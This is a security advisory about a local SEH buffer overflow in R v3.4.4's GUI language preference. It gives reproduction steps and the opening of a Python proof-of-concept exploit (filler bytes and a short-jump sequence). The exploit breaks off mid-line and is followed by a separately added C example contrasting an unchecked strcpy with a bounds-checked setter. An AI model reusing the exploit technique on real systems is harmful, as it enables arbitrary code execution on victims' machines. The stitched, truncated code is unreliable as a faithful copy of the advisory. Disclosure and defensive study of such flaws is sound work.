Document Title:
===============
R v3.4.4 Software - (SEH) Buffer Overflow Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2143

Release Date:
=============
2018-08-26

Vulnerability Laboratory ID (VL-ID):
====================================
2143

Common Vulnerability Scoring System:
====================================
6.5

Vulnerability Class:
====================
Buffer Overflow

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
R is a language and environment for statistical computing and graphics. It is a GNU project which is similar to the S language and environment which was developed at Bell Laboratories (formerly AT&T, now Lucent Technologies) by John Chambers and colleagues. R can be considered as a different implementation of S. There are some important differences, but much code written for S runs unaltered under R. R is available as Free Software under the terms of the Free Software Foundation's GNU General Public License in source code form. It compiles and runs on a wide variety of UNIX platforms and similar systems (including FreeBSD and Linux), Windows and MacOS.

(Copy of the Homepage: https://www.r-project.org/about.html )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a buffer overflow vulnerability in the official R v3.4.4 software.
Vulnerability Disclosure Timeline:
==================================
2018-08-27: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
R Project
Product: R - Software (Windows & MacOS) 3.4.4

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software. The vulnerability allows local attackers to overwrite the registers (for example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is classified as a classic buffer overflow issue.

Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers without user interaction and with system privileges. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability:
Under GUI preferences, paste the contents of bo.txt into 'Language for menus and messages'.
Click OK --> Now the calculator executes!

--- PoC (Exploit) ---
#--------------------------------------------------------#
#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-08-22
#Vendor Homepage : https://www.r-project.org/
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/
#--------------------------------------------------------#
#!/usr/bin/python
from struct import pack

buffer = "\x41" * 900          # 900 bytes of filler
a = "\xeb\x14\x90\x90"         # short jump followed by NOP padding
b = pack("
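The defect class behind this advisory, shown as an added example that is not code from the advisory, from ZwX or from the R project: a hypothetical preference setter that copies the 'Language for menus and messages' string into a fixed stack buffer with no length check, beside a bounds-checked version that rejects oversized input such as the PoC's 900-byte filler. The struct layout, buffer size and function names are assumptions, not R's real implementation.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size preference record (assumed layout, not R's). */
#define LANG_MAX 64

struct gui_prefs {
    char lang[LANG_MAX];   /* 'Language for menus and messages' */
};

/* Vulnerable pattern: strcpy trusts the length of the caller's string.
 * Anything longer than LANG_MAX - 1 bytes runs past lang[] and overwrites
 * whatever follows it in memory; when the buffer lives on the stack, that
 * is how the exception handler record (SEH) gets clobbered. Not called
 * below on purpose: running it is undefined behaviour. */
void set_lang_unchecked(struct gui_prefs *p, const char *value)
{
    strcpy(p->lang, value);
}

/* Hardened: bound the length scan, reject input that cannot fit together
 * with its terminator, and leave the old value intact on rejection.
 * Returns 0 on success, -1 when the input is too long. */
int set_lang_checked(struct gui_prefs *p, const char *value)
{
    const char *end = memchr(value, '\0', LANG_MAX);  /* scan at most LANG_MAX */
    if (end == NULL)                                   /* no terminator in range */
        return -1;
    size_t n = (size_t)(end - value);                  /* n <= LANG_MAX - 1 */
    memcpy(p->lang, value, n);
    p->lang[n] = '\0';
    return 0;
}

/* Constructed sample input: the 900-byte run of 'A' the PoC starts with
 * (only the filler, not the rest of the payload). Returns bytes written. */
size_t build_filler(char *out, size_t cap, size_t len)
{
    if (len >= cap)
        len = cap - 1;
    memset(out, 'A', len);
    out[len] = '\0';
    return len;
}

int main(void)
{
    struct gui_prefs p;
    char filler[1024];
    build_filler(filler, sizeof filler, 900);
    printf("normal value:   %d\n", set_lang_checked(&p, "en"));     /* 0 */
    printf("900-byte value: %d\n", set_lang_checked(&p, filler));   /* -1 */
    return 0;
}
```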